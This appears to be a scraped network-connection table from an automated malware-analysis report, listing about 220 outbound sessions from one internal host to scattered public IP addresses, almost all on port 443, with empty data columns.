                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28547192.168.2.2347508109.63.73.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28548192.168.2.2336974197.247.251.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28549192.168.2.2344732121.152.149.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28550192.168.2.236009646.33.72.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28551192.168.2.2344846154.191.125.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28552192.168.2.234410685.164.15.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28553192.168.2.235349481.111.3.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28554192.168.2.233616464.209.218.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28555192.168.2.2353454118.125.244.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28556192.168.2.2340442222.99.73.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28557192.168.2.2349500173.107.30.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28558192.168.2.235145818.203.164.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28559192.168.2.2337992181.114.116.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28560192.168.2.2360132143.233.32.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28561192.168.2.2337458145.72.116.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28562192.168.2.2353992176.113.187.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28563192.168.2.234768883.137.146.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28564192.168.2.234882647.172.104.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28565192.168.2.2349256164.234.131.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28566192.168.2.2333378133.72.217.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28567192.168.2.2357010113.71.128.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28568192.168.2.234978490.43.106.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28569192.168.2.2333658100.158.33.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28570192.168.2.2350484128.176.247.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28571192.168.2.2343410191.230.219.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28572192.168.2.2356526119.125.190.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28573192.168.2.2337252100.227.130.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28574192.168.2.235499247.118.215.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28575192.168.2.2353922177.73.95.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28576192.168.2.2354510175.89.246.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28577192.168.2.235985612.22.150.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28578192.168.2.2360608203.216.97.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28579192.168.2.2347860117.42.188.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28580192.168.2.2337800150.195.1.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28581192.168.2.234619052.134.169.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28582192.168.2.2349742212.37.111.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28583192.168.2.235791699.69.118.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28584192.168.2.235965073.121.115.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28585192.168.2.2336952164.171.0.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28586192.168.2.234902657.107.26.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28587192.168.2.2351578220.108.16.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28588192.168.2.2338386213.190.171.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28589192.168.2.234320674.63.21.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28590192.168.2.2352510110.251.196.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28591192.168.2.234636298.32.111.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28592192.168.2.233288479.135.213.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28593192.168.2.2335236172.228.60.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28594192.168.2.2342752160.49.63.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28595192.168.2.2352610202.213.248.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28596192.168.2.2340408160.21.201.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28597192.168.2.2338518100.234.52.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28598192.168.2.2358808193.181.59.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28599192.168.2.2338610207.173.41.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28600192.168.2.234138449.202.26.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28601192.168.2.2351786125.140.21.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28602192.168.2.2340540106.106.224.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28603192.168.2.2346586158.152.206.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28604192.168.2.234155495.231.50.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28605192.168.2.2357952223.190.252.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28606192.168.2.234409847.97.37.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28607192.168.2.2343526137.36.7.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28608192.168.2.234477475.235.71.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28609192.168.2.2350348114.44.184.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28610192.168.2.235443478.29.97.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28611192.168.2.2352884144.28.2.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28612192.168.2.2357696161.19.173.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28613192.168.2.235022671.177.154.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28614192.168.2.2357420142.186.242.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28615192.168.2.2342930193.189.121.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28616192.168.2.235214824.21.75.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28617192.168.2.2341012185.11.48.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28618192.168.2.236049060.59.138.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28619192.168.2.235260291.114.34.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28620192.168.2.234699680.193.53.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28621192.168.2.235363446.64.173.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28622192.168.2.235983618.162.93.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28623192.168.2.2334342197.142.199.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28624192.168.2.233878466.204.70.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28625192.168.2.2353864148.140.157.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28626192.168.2.234082034.71.220.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28627192.168.2.2340600141.243.225.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28628192.168.2.2340016180.232.240.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28629192.168.2.2353354190.139.242.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28630192.168.2.2359268195.98.216.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28631192.168.2.2336684217.114.192.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28632192.168.2.2347656168.136.142.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28633192.168.2.2359182203.11.128.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28634192.168.2.235143091.174.89.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28635192.168.2.2354850196.253.36.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28636192.168.2.2335166155.246.110.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28637192.168.2.234586459.153.105.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28638192.168.2.2337006188.221.120.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28639192.168.2.2346652111.151.237.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28640192.168.2.2346006151.73.11.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28641192.168.2.2341244201.90.132.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28642192.168.2.2359178147.52.177.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28643192.168.2.235626283.63.181.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28644192.168.2.2347270129.247.218.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28645192.168.2.235080491.37.161.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28646192.168.2.234401248.68.214.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28647192.168.2.2355650216.122.170.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28648192.168.2.2340532120.221.208.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28649192.168.2.2360526221.219.125.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28650192.168.2.2347958128.103.220.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28651192.168.2.2354164149.231.246.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28652192.168.2.235656438.196.232.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28653192.168.2.233623627.183.162.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28654192.168.2.2346648180.119.225.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28655192.168.2.2349186208.50.24.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28656192.168.2.2338496150.178.206.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28657192.168.2.2344878191.73.14.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28658192.168.2.2357798208.183.236.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28659192.168.2.233407280.181.206.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28660192.168.2.2357646174.23.116.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28661192.168.2.2355912152.179.118.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28662192.168.2.235564234.49.230.478080
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28663192.168.2.2350072165.192.34.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28664192.168.2.235541044.197.223.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28665192.168.2.2358472177.236.130.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28666192.168.2.2354086179.6.56.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28667192.168.2.2340368212.41.164.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28668192.168.2.235121464.26.40.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28669192.168.2.2345794164.12.221.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28670192.168.2.234250688.94.70.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28671192.168.2.233617260.28.132.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28672192.168.2.235407820.92.151.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28673192.168.2.2349204168.255.199.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28674192.168.2.234766291.245.61.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28675192.168.2.2357898137.6.199.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28676192.168.2.235276859.17.230.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28677192.168.2.2357884119.244.83.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28678192.168.2.2339402176.180.18.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28679192.168.2.2340838213.193.26.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28680192.168.2.2344752160.45.202.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28681192.168.2.233539014.25.64.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28682192.168.2.2335710192.220.34.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28683192.168.2.235323443.210.190.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28684192.168.2.234683470.117.137.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28685192.168.2.234138663.161.144.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28686192.168.2.2353302138.118.84.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28687192.168.2.2352316156.79.38.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28688192.168.2.234781690.131.102.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28689192.168.2.235830661.38.107.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28690192.168.2.234742066.193.59.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28691192.168.2.234346298.145.222.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28692192.168.2.234357620.230.126.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28693192.168.2.2355440182.132.46.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28694192.168.2.233592240.113.63.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28695192.168.2.2347084135.3.1.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28696192.168.2.235942498.74.52.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28697192.168.2.235148062.140.81.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28698192.168.2.2340978168.19.189.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28699192.168.2.234263058.68.88.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28700192.168.2.235162024.242.42.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28701192.168.2.2349382136.45.64.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28702192.168.2.235902813.35.99.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28703192.168.2.235959891.125.163.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28704192.168.2.2334140149.98.31.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28705192.168.2.2333064152.230.210.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28706192.168.2.2343662184.14.20.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28707192.168.2.2348486138.82.253.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28708192.168.2.233345252.247.34.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28709192.168.2.235097018.1.153.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28710192.168.2.235236441.48.147.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28711192.168.2.2342792201.69.135.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28712192.168.2.2339946206.118.149.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28713192.168.2.235839868.112.47.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28714192.168.2.2343610169.57.37.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28715192.168.2.2338732154.215.134.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28716192.168.2.2346176113.144.235.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28717192.168.2.2358340208.201.68.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28718192.168.2.2338822181.65.35.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28719192.168.2.2334964154.255.60.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28720192.168.2.2336534186.22.202.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28721192.168.2.2353124192.19.41.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28722192.168.2.236090434.12.164.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28723192.168.2.2338272102.89.164.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28724192.168.2.2333166135.161.36.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28725192.168.2.2349464166.121.151.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28726192.168.2.234606092.117.123.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28727192.168.2.234973644.219.106.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28728192.168.2.2359288139.12.208.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28729192.168.2.2334014191.142.145.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28730192.168.2.2346254107.112.74.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28731192.168.2.2339754124.16.124.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28732192.168.2.235005453.216.6.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28733192.168.2.2347064119.68.172.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28734192.168.2.2346298135.236.13.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28735192.168.2.234963873.138.99.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28736192.168.2.2343410142.233.150.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28737192.168.2.2360624145.176.0.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28738192.168.2.2348628196.203.19.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28739192.168.2.235858658.221.174.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28740192.168.2.2341370218.254.67.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28741192.168.2.235031278.161.104.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28742192.168.2.235440289.194.215.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28743192.168.2.2359288153.79.183.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28744192.168.2.234973488.116.223.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28745192.168.2.2349388115.90.13.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28746192.168.2.233911470.231.80.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28747192.168.2.2359460116.78.42.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28748192.168.2.2355630125.233.128.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28749192.168.2.2354144204.214.3.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28750192.168.2.234759887.150.61.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28751192.168.2.2333544219.158.221.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28752192.168.2.2341758148.240.145.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28753192.168.2.2357632194.171.27.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28754192.168.2.2346928148.76.112.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28755192.168.2.234606019.132.84.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28756192.168.2.233930845.201.62.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28757192.168.2.233690038.29.166.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28758192.168.2.2353350143.247.213.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28759192.168.2.235149240.204.23.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28760192.168.2.2354268129.11.161.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28761192.168.2.235958232.246.168.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28762192.168.2.2341086201.4.164.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28763192.168.2.2352586128.98.0.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28764192.168.2.2342936119.47.107.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28765192.168.2.2353338153.211.39.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28766192.168.2.233483686.76.179.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28767192.168.2.2357862192.84.42.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
